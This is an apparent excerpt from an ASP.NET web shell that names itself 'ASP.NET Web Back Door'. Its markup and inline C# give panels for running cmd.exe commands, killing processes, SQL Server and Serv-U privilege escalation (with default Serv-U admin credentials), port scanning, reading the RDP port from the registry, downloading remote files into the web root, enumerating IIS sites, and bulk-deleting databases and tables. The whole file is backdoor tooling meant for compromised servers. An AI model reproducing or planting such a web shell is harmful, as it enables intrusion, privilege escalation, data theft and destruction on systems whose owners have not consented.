<td style="width: 289px; height: 21px;" align="center">
<asp:Button ID="find" runat="server" Font-Size="12px" Text=" 查 找 " OnClick="find_Click" /></td>
<td style="width: 100px; height: 21px;">
</td>
</tr>
<tr>
<td align="center" colspan="3" style="height: 34px">
<%=omumastr %>
</td>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue !="")
{
if (TreeView4.SelectedNode.Text == "系统信息")
{
%>
<hr />
<table style="width: 631px; font-size: 12px;">
<tr>
<td colspan="3" rowspan="3" style="height: 21px" align="left">
<%=jsjname + "<br><br>" + "本机IP: " + Request.ServerVariables["LOCAL_ADDR"] + "<br><br>" + getvs + "<br><br>" + getusername + "<br><br>" + getwdir + "<br><br>" + systime + "<br><br>" + "本文件路径: " + Server.MapPath(Request.ServerVariables["PATH_INFO"]) + "<br><br>" + getosname + "<br><br>" %>
</td>
</tr>
<tr>
</tr>
<tr>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue != "")
{
if (TreeView4.SelectedNode.Text == "Cmd执行")
{
%>
<hr />
<table style="width: 631px; font-size: 12px;">
<tr>
<td colspan="3" style="height: 32px">
执行CmdShell</td>
</tr>
<tr>
<td style="width: 114px; height: 29px;">
CMD:</td>
<td colspan="2" style="height: 29px" align="left">
<asp:TextBox ID="cmdurl" runat="server" Width="320px" Font-Size="12px">cmd.exe</asp:TextBox></td>
</tr>
<tr>
<td style="width: 114px; height: 29px;">
命令:</td>
<td colspan="2" align="left">
<asp:TextBox ID="cmd" runat="server" Width="320px" Font-Size="12px">Set</asp:TextBox></td>
</tr>
<tr>
<td style="width: 114px; height: 158px">
回显:</td>
<td colspan="2" style="height: 158px" align="left">
<asp:TextBox ID="cmdshow" runat="server" TextMode="MultiLine" Width="472px" Height="140px" Font-Size="12px"></asp:TextBox></td>
</tr>
<tr>
<td style="width: 114px; height: 25px">
</td>
<td colspan="2" style="height: 25px" align="center">
<asp:Button ID="cmdbtn" runat="server" Font-Size="12px" Text=" 执 行 " OnClick="cmdbtn_Click" /></td>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue != "")
{
if (TreeView4.SelectedNode.Text == "进程管理")
{
%>
<hr />
<table style="font-size: 12px; width: 631px">
<tr>
<td style="width: 155px" align="center">
新进程:</td>
<td colspan="2" align="left">
<asp:TextBox ID="newjc" runat="server" Width="193px" Font-Size="12px"></asp:TextBox>&nbsp;
<asp:Button ID="qidong" runat="server" Font-Size="12px" Text=" 启 动 " OnClick="qidong_Click" /></td>
</tr>
<tr>
<td style="width: 155px; height: 153px;">
进程管理:</td>
<td colspan="2" style="height: 153px" align="left">
<asp:ListBox ID="ListBox1" runat="server" Height="140px" Width="462px" Font-Size="12px"></asp:ListBox></td>
</tr>
<tr>
<td style="width: 155px; height: 21px">
</td>
<td colspan="2" style="height: 21px" align="center">
<asp:Button ID="kp" runat="server" Text="结束进程" Font-Size="12px" OnClick="kp_Click" /></td>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue != "")
{
if (TreeView4.SelectedNode.Text == "SQL提权(SA)")
{
%>
<hr />
<table style="width: 795px; font-size: 12px;">
<tr>
<td align="center" colspan="3" style="height: 31px">
<table>
<tr>
<td style="width: 200px">
帐户:&nbsp;</td>
<td style="width: 100px">
<asp:TextBox ID="sqlname" runat="server" Width="160px"></asp:TextBox></td>
<td style="width: 100px">
&nbsp;&nbsp; 口令:</td>
<td style="width: 100px">
<asp:TextBox ID="sqlpass" runat="server" Width="160px"></asp:TextBox></td>
<td style="width: 100px">
&nbsp;&nbsp; 端口:</td>
<td style="width: 100px">
<asp:TextBox ID="sqlport" runat="server" Width="160px">1433</asp:TextBox></td>
</tr>
</table>
</td>
</tr>
<tr>
<td style="width: 172px; height: 35px;">
选择:</td>
<td colspan="2" align="left" style="height: 36px">
<asp:DropDownList ID="DropDownList1" runat="server" Font-Size="12px" Width="337px">
</asp:DropDownList></td>
</tr>
<tr>
<td style="width: 172px; height: 35px;">
命令:</td>
<td colspan="2" align="left" style="height: 35px; color: #ff0000;">
<asp:TextBox ID="shellcmd" runat="server" Width="382px"></asp:TextBox>
&nbsp;&nbsp;&nbsp; ( SA映像劫持不需要输入任何命令)</td>
</tr>
<tr>
<td style="width: 172px; height: 157px;">
回显:</td>
<td colspan="2" style="height: 157px" align="left">
<asp:TextBox ID="sqlshow" runat="server" Height="140px" TextMode="MultiLine" Width="552px"></asp:TextBox></td>
</tr>
<tr>
<td style="width: 172px; height: 30px;">
</td>
<td colspan="2" style="height: 30px">
<asp:Button ID="sqlbtn" runat="server" Font-Size="12px" Text=" 执 行 " OnClick="sqlbtn_Click" /></td>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue !="")
{
if (TreeView4.SelectedNode.Text == "SQL提权(dbowner or public)")
{
%>
<hr />
<table style="width: 795px; font-size: 12px;">
<tr>
<td align="center" colspan="3">
<table style="width: 759px">
<tr>
<td style="width: 162px; height: 26px;">
帐户:&nbsp;</td>
<td style="width: 100px; height: 26px;">
<asp:TextBox ID="dbname" runat="server" Width="100px"></asp:TextBox></td>
<td style="width: 100px; height: 26px;">
口令:&nbsp;</td>
<td style="width: 100px; height: 26px;">
<asp:TextBox ID="dbpass" runat="server" Width="100px"></asp:TextBox></td>
<td style="width: 100px; height: 26px;">
端口:&nbsp;</td>
<td style="width: 100px; height: 26px;">
<asp:TextBox ID="dbport" runat="server" Width="100px">1433</asp:TextBox></td>
</tr>
</table>
</td>
</tr>
<tr>
<td style="width: 194px; height: 35px;">
命令:</td>
<td colspan="2" align="left" style="height: 35px">
<asp:TextBox ID="dbcmd" runat="server" Width="382px"></asp:TextBox></td>
</tr>
<tr>
<td style="width: 194px; height: 157px;">
回显:</td>
<td colspan="2" style="height: 157px">
<asp:TextBox ID="dbshow" runat="server" Height="140px" TextMode="MultiLine" Width="585px"></asp:TextBox></td>
</tr>
<tr>
<td style="width: 194px; height: 26px;">
</td>
<td colspan="2" style="height: 26px">
<asp:Button ID="dbbtn" runat="server" Font-Size="12px" Text=" 执 行 " OnClick="dbbtn_Click" /></td>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue !="")
{
if (TreeView4.SelectedNode.Text == "注册表读取")
{
%>
<hr />
<table style="width: 631px; font-size: 12px;">
<tr>
<td style="width: 174px; height: 26px;">
读取注册表:</td>
<td style="width: 286px; height: 26px;">
<asp:TextBox ID="regtext" runat="server" Width="374px" Font-Size="12px">HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber</asp:TextBox></td>
<td style="width: 100px; height: 26px;">
<asp:Button ID="readreg" runat="server" Font-Size="12px" OnClick="readreg_Click"
Text=" 读 取 " /></td>
</tr>
<tr>
<td style="width: 174px; height: 22px;">
</td>
<td style="width: 286px; height: 22px; font-size: 12px; color: #ff0000;">
<%=oregstr %>
</td>
<td style="width: 100px; height: 22px;">
</td>
</tr>
<tr>
<td style="width: 174px; height: 27px">
</td>
<td style="width: 286px; height: 27px">
</td>
<td style="width: 100px; height: 27px">
</td>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue !="")
{
if (TreeView4.SelectedNode.Text == "端口扫描")
{
%>
<hr />
<table style="width: 631px; font-size: 12px;">
<tr>
<td style="font-size: 12px; width: 172px; height: 26px">
</td>
<td colspan="2" style="height: 26px">
扫 描 端 口</td>
</tr>
<tr>
<td style="width: 172px; height: 36px;">
端口设置:</td>
<td colspan="2" style="height: 36px">
<asp:TextBox ID="scanport" runat="server" Width="416px">21,25,80,135,139,443,445,1025,1433,3389,4899,5631,5900,43958</asp:TextBox></td>
</tr>
<tr>
<td style="width: 172px; height: 147px;">
扫描结果:</td>
<td colspan="2" style="height: 147px">
<asp:ListBox ID="ListBox2" runat="server" Height="133px" Width="420px"></asp:ListBox></td>
</tr>
<tr>
<td style="width: 172px; height: 21px;">
</td>
<td colspan="2" style="height: 21px">
<asp:Button ID="scan" runat="server" Font-Size="12px" Text=" 扫 描 " OnClick="scan_Click" /></td>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue != "")
{
if (TreeView4.SelectedNode.Text == "远程下载")
{
remoteurl.Text = "http://hi.baidu.com/ahhacker86";
localurl.Text = Server.MapPath(".") + @"\jk.asp";
%>
<hr />
<table style="font-size: 12px; width: 631px; text-align: center;">
<tr>
<td style="width: 163px; height: 32px;">
远程文件:</td>
<td style="width: 100px">
<asp:TextBox ID="remoteurl" runat="server" Width="313px" Font-Size="12px"></asp:TextBox></td>
<td style="width: 100px">
</td>
</tr>
<tr>
<td style="width: 163px; height: 32px">
保存地址:</td>
<td style="width: 100px; height: 32px">
<asp:TextBox ID="localurl" runat="server" Width="312px" Font-Size="12px"></asp:TextBox></td>
<td style="width: 100px; height: 32px">
</td>
</tr>
</table>
<table style="width: 631px">
<tr>
<td style="width: 136px">
</td>
<td style="width: 169px">
<asp:Button ID="filebtn" runat="server" Font-Size="12px" OnClick="filebtn_Click"
Text=" 保 存 " /></td>
<td style="width: 100px">
</td>
</tr>
</table>
<%
}
}
if (TreeView5.SelectedValue != "")
{
if (TreeView5.SelectedNode.Text == "SQL Server")
{
%>
<hr />
<table style="font-size: 12px; width: 631px">
<tr>
<td style="width: 100px; height: 26px;">
sql帐户:</td>
<td style="width: 100px; height: 26px;">
<asp:TextBox ID="kusqlname" runat="server" Width="74px"></asp:TextBox></td>
<td style="width: 100px; height: 26px;">
sql密码:</td>
<td style="width: 100px; height: 26px;">
<asp:TextBox ID="kusqlpass" runat="server" Width="84px"></asp:TextBox></td>
<td style="width: 100px; height: 26px;">
端口:</td>
<td style="width: 100px; height: 26px;">
<asp:TextBox ID="kusqlport" runat="server" Width="82px">1433</asp:TextBox></td>
</tr>
</table>
<table>
<tr>
<td style="width: 305px; height: 24px;">
</td>
<td style="width: 153px; height: 24px;">
<asp:Button ID="kubtn" runat="server" Font-Size="12px" OnClick="kubtn_Click" Text=" 连 接 " /></td>
<td style="width: 228px; height: 24px;">
</td>
</tr>
</table>
<hr />
<table style="font-size: 12px; width: 816px">
<tr>
<td style="width: 67px; height: 138px">
SQL数据库:</td>
<td style="width: 10px; height: 138px" align="left">
<asp:ListBox ID="ListBox3" runat="server" Width="312px" Height="126px" Font-Size="12px"></asp:ListBox></td>
<td style="width: 93px; height: 138px" align="center">
<asp:Button ID="kutable" runat="server" OnClick="kutable_Click" Text="查表-->" Font-Size="12px" /></td>
<td style="width: 11px; height: 138px">
<asp:ListBox ID="ListBox4" runat="server" Width="312px" Height="129px" Font-Size="12px"></asp:ListBox></td>
</tr>
</table>
<hr />
<table style="width: 887px; font-size: 12px; text-align: center;">
<tr>
<td style="width: 100px; font-size: 12px; text-align: center;" align="left">
<table style="width: 699px; margin-left:100px;">
<tr>
<td style="width: 100px; height: 7px">
<asp:Button ID="databtn" runat="server" Text="显示指定表数据" OnClick="databtn_Click" Font-Size="12px" /></td>
<td style="width: 100px; height: 7px">
<asp:Button ID="Button4" runat="server" Font-Size="12px" Text="批量删除用户表" OnClick="Button4_Click" /></td>
<td style="width: 114px; height: 7px">
<asp:Button ID="delzdb" runat="server" Font-Size="12px" Text="删除指定用户表" OnClick="delzdb_Click" /></td>
<td style="width: 100px; height: 7px">
<asp:Button ID="delku" runat="server" Font-Size="12px" Text="批量删除用户库" OnClick="delku_Click" /></td>
<td style="width: 100px; height: 7px">
<asp:Button ID="delzdk" runat="server" Font-Size="12px" Text="删除指定用户库" OnClick="delzdk_Click" /></td>
</tr>
</table>
</td>
</tr>
</table>
<hr />
<table style="font-size: 12px; width: 888px">
<tr>
<td style="width: 95px; height: 56px">
&nbsp;
<table style="width: 370px">
<tr>
<td style="width: 100px; height: 25px">
<asp:TextBox ID="datastr" runat="server" Width="267px" Font-Size="12px">DELETE FROM [TableName] WHERE ID=100</asp:TextBox></td>
<td style="width: 100px; height: 25px">
<asp:Button ID="dropdata" runat="server" Font-Size="12px" OnClick="dropdata_Click"
Text="删除数据" /></td>
</tr>
</table>
</td>
<td style="width: 100px; height: 56px">
&nbsp;
<table>
<tr>
<td style="width: 91px; height: 19px">
<asp:TextBox ID="dataupdate" runat="server" Width="258px" Font-Size="12px">UPDATE [TableName] SET USER='username' WHERE ID=100</asp:TextBox></td>
<td style="width: 100px; height: 19px">
<asp:Button ID="updatebtn" runat="server" Font-Size="12px" OnClick="updatebtn_Click"
Text="更新数据" /></td>
</tr>
</table>
</td>
</tr>
<tr>
<td style="width: 95px; height: 50px;">
&nbsp;<table>
<tr>
<td style="width: 106px">
<asp:TextBox ID="dataadd" runat="server" Font-Size="12px" Width="272px">INSERT INTO [TableName](USER,PASS) VALUES('username','password')</asp:TextBox></td>
<td style="width: 100px">
<asp:Button ID="addbtn" runat="server" Font-Size="12px" OnClick="addbtn_Click" Text="添加数据" /></td>
</tr>
</table>
&nbsp;
</td>
<td style="width: 100px; height: 50px;">
&nbsp;
<table>
<tr>
<td style="width: 100px">
<asp:TextBox ID="addbiao" runat="server" Font-Size="12px" Width="258px">CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))</asp:TextBox></td>
<td style="width: 100px">
<asp:Button ID="ctbtn" runat="server" Font-Size="12px" Text="建立新表" OnClick="ctbtn_Click" /></td>
</tr>
</table>
</td>
</tr>
</table>
<hr />
<table style="width: 888px; font-size: 12px; text-align: left;">
<tr>
<td align="left" colspan="2" style="text-align: center; height: 170px;" rowspan="2">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;
<asp:GridView ID="GridView1" runat="server" CellPadding="4" ForeColor="#333333" GridLines="None" Width="498px">
<FooterStyle BackColor="#990000" Font-Bold="True" ForeColor="White" />
<RowStyle BackColor="#FFFBD6" ForeColor="#333333" />
<SelectedRowStyle BackColor="#FFCC66" Font-Bold="True" ForeColor="Navy" />
<PagerStyle BackColor="#FFCC66" ForeColor="#333333" HorizontalAlign="Center" />
<HeaderStyle BackColor="#990000" Font-Bold="True" ForeColor="White" />
<AlternatingRowStyle BackColor="White" />
</asp:GridView>
&nbsp;
</td>
</tr>
<tr>
</tr>
</table>
<%
}
}
if (TreeView5.SelectedValue !="")
{
if (TreeView5.SelectedNode.Text =="Access")
{
%>
<table style="font-size: 12px; width: 631px">
<tr>
<td style="width: 111px; height: 27px;">
Access数据库:</td>
<td style="width: 100px; height: 27px;">
<asp:TextBox ID="accstr" runat="server" Font-Size="12px" Width="393px">Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\ASP\zf34\zf34\Database\zf11.mdb;Jet OLEDB:Database Password=***</asp:TextBox></td>
<td style="width: 100px; height: 27px;">
<asp:Button ID="accconn" runat="server" Font-Size="12px" Text=" 连 接 " OnClick="accconn_Click" /></td>
</tr>
<tr>
<td colspan="3" rowspan="2" style="height: 32px" align="center">
<asp:Button ID="acczdb" runat="server" Font-Size="12px" Text="删除指定表" OnClick="acczdb_Click" />
<asp:Button ID="accpl" runat="server" Font-Size="12px" Text="批量删除表" OnClick="accpl_Click" /></td>
</tr>
<tr>
</tr>
</table>
<hr />
<table style="font-size: 12px; width: 631px">
<tr>
<td style="width: 87px; height: 94px">
显示所有表:</td>
<td style="width: 100px; height: 94px">
<asp:ListBox ID="ListBox5" runat="server" Width="379px" Height="89px" DataTextField="table_name" AutoPostBack="True" OnSelectedIndexChanged="ListBox5_SelectedIndexChanged"></asp:ListBox></td>
</tr>
</table>
<hr />
<table style="font-size: 12px; width: 888px">
<tr>
<td style="width: 213px">
<asp:TextBox ID="addtxt" runat="server" Font-Size="12px" Width="211px">INSERT INTO [TableName](USER,PASS) VALUES('username','password')</asp:TextBox></td>
<td style="width: 100px">
<asp:Button ID="accadd" runat="server" Font-Size="12px" Text="添加数据" OnClick="accadd_Click" /></td>
<td style="width: 100px">
<asp:TextBox ID="updatetxt" runat="server" Font-Size="12px" Width="211px">UPDATE [TableName] SET USER='username' WHERE ID=100</asp:TextBox></td>
<td style="width: 100px">
<asp:Button ID="accupdate" runat="server" Font-Size="12px" Text="更新数据" OnClick="accupdate_Click" /></td>
<td style="width: 100px">
<asp:TextBox ID="deltxt" runat="server" Font-Size="12px" Width="211px">DELETE FROM [TableName] WHERE ID=100</asp:TextBox></td>
<td style="width: 100px">
<asp:Button ID="accdel" runat="server" Font-Size="12px" Text=" 删 除 " OnClick="accdel_Click" /></td>
</tr>
</table>
<hr />
<table style="font-size: 12px; width: 888px">
<tr>
<td style="width: 888px; height: 38px">
&nbsp;<asp:GridView ID="GridView2" runat="server" CellPadding="4" ForeColor="#333333" GridLines="None" Width="863px" style="font-size: 12px" >
<FooterStyle BackColor="#507CD1" Font-Bold="True" ForeColor="White" />
<RowStyle BackColor="#EFF3FB" />
<EditRowStyle BackColor="#2461BF" />
<SelectedRowStyle BackColor="#D1DDF1" Font-Bold="True" ForeColor="#333333" />
<PagerStyle BackColor="#2461BF" ForeColor="White" HorizontalAlign="Center" />
<HeaderStyle BackColor="#507CD1" Font-Bold="True" ForeColor="White" />
<AlternatingRowStyle BackColor="White" />
</asp:GridView>
</td>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue != "")
{
if (TreeView4.SelectedNode.Text == "SU提权")
{
%>
<hr />
<table style="font-size: 12px; width: 631px">
<tr>
<td colspan="2" style="height: 34px" align="center">
Sev-U 提 权</td>
</tr>
<tr>
<td align="center" colspan="2" style="height: 25px">
SU帐户:&nbsp; &nbsp;<asp:TextBox ID="jksuname" runat="server" Font-Size="12px" Width="240px">LocalAdministrator</asp:TextBox></td>
</tr>
<tr>
<td align="center" colspan="2" style="height: 17px">
SU密码: &nbsp;
<asp:TextBox ID="jksupass" runat="server" Font-Size="12px" Width="240px">#l@$ak#.lk;0@P</asp:TextBox></td>
</tr>
<tr>
<td align="center" colspan="2">
SU端口:&nbsp; &nbsp;<asp:TextBox ID="jksuport" runat="server" Font-Size="12px" Width="240px">43958</asp:TextBox></td>
</tr>
<tr>
<td align="center" colspan="2" style="height: 24px">
系统命令: &nbsp;<asp:TextBox ID="jksucmd" runat="server" Font-Size="12px" Width="240px"></asp:TextBox></td>
</tr>
<tr>
<td colspan="2" style="height: 34px" align="center">
<asp:Button ID="jksubtn" runat="server" Font-Size="12px" Text=" 执 行 " OnClick="jksubtn_Click" /></td>
</tr>
</table>
<%
}
}
if (TreeView5.SelectedValue != "")
{
if (TreeView5.SelectedNode.Text == "文件打包")
{
%>
<hr />
<table style="font-size: 12px; width: 321px">
<tr>
<td style="width: 147px; height: 30px;" align="center">
打包目录:</td>
<td style="width: 107px; height: 30px;" align="left">
<asp:TextBox ID="daboml" runat="server" Style="font-size: 12px" Width="190px"></asp:TextBox></td>
</tr>
<tr>
<td style="width: 147px; height: 30px" align="center">
生成地址:</td>
<td style="width: 107px; height: 30px" align="left">
<asp:TextBox ID="dabaodz" runat="server" Style="font-size: 12px" Width="190px"></asp:TextBox></td>
</tr>
<tr>
<td style="width: 147px; height: 30px" align="center">
</td>
<td style="height: 30px" colspan="2">
<asp:Button ID="dabaobtn" runat="server" Style="font-size: 12px" Text=" 打 包 " OnClick="dabaobtn_Click" /></td>
</tr>
</table>
<%
}
}
if (TreeView5.SelectedValue !="")
{
if (TreeView5.SelectedNode.Text == "About")
{
%>
<hr />
<table style="width: 666px; height: 215px">
<tr>
<td style="width: 100px; height: 296px;"><img src ="http://www.ahiec.net/ewebeditor/uploadfile/2009410054896125.gif" alt="jk1986" style="width: 666px; height: 215px" />
</td>
</tr>
</table>
<%
}
}
if (TreeView4.SelectedValue != "")
{
if (TreeView4.SelectedNode.Text == "遍历IIS")
{
string iisstr = "IIS://localhost/W3SVC";
DirectoryEntry jkde = new DirectoryEntry(iisstr);
Response.Write(" <hr />");
Response.Write("<table style='width: 600px; font-size: 12px; text-align: center;'>");
Response.Write("<tr>");
Response.Write("<td style='width: 295px; height: 29px;' align='center'>");
Response.Write("IIS帐户</td>");
Response.Write("<td style='width: 204px; height: 29px;' align='center'>");
Response.Write(" 域</td>");
Response.Write("<td style='width: 181px; height: 29px;' align='center'>");
Response.Write(" 路径:</td>");
Response.Write("</tr>");
foreach (DirectoryEntry destr in jkde.Children)
{
if (chknumber(destr.Name.ToString()))
{
string destrname = destr.Name.ToString();
DirectoryEntry dirstr = new DirectoryEntry(iisstr + "/" + destrname);
DirectoryEntry dirstr1 = dirstr.Children.Find("root", "IIsWebVirtualDir");
iisusername = dirstr1.Properties["AnonymousUserName"].Value.ToString();
iisdk = destr.Properties["ServerBindings"][0].ToString();
iiswebpath = dirstr1.Properties["path"].Value.ToString();
Response.Write("<tr>");
Response.Write ("<td style='width: 295px; height: 27px; font-size: 12px;' align='center'>");
Response.Write(iisusername);
Response.Write("</td>");
Response.Write("<td style='width: 204px; height: 27px;' align='center'>");
Response.Write(iisdk);
Response.Write("<td style='width: 181px; height: 27px;' align='center'>");
Response.Write ("<a href= '?action=showfolder&folder=");
Response.Write(iiswebpath);
Response.Write("'>");
Response.Write(iiswebpath);
Response.Write("</a></td></tr>");
}
}
Response.Write(" </table>");
%>
<%
}
}
%>
<%
}
if (TreeView5.SelectedValue != "")
{
if (TreeView5.SelectedNode.Text == "退出登陆")
{
Session["jksession"] = null;
Session.Abandon();
Response.Write("<script>alert('Thanks Use This BackDoor ^_^ ');location.href='" + getselfurl + "'</" + "script>");
}
}
%>
<%
if (Session ["jksession"] == null )
{
%>
<table style="font-size: 12px; width: 600px">
<tr>
<td colspan="3" style="height: 30px" align="center">
&nbsp; &nbsp; ASP.NET&nbsp; Web Back Door</td>
</tr>
<tr>
<td style="width: 185px; height: 45px" align="center">
OwnerPass:</td>
<td style="width: 129px; height: 45px;" align="center">
<asp:TextBox ID="TextBox1" runat="server" Font-Size="12px" Width="235px" TextMode="Password"></asp:TextBox></td>
<td style="width: 154px; height: 45px;" align="center">
<asp:Button ID="Button5" runat="server" Font-Size="12px" Text="Login" OnClick="Button5_Click" /></td>
</tr>
<tr>
<td colspan="3" style="height: 30px" align="center">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;
Code &nbsp; By &nbsp; <a href="http://www.jk1986.cn" target ="_blank" >
夢幻★劍客</a> &nbsp;
&nbsp;</td>
</tr>
</table>
<%
}
%>
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink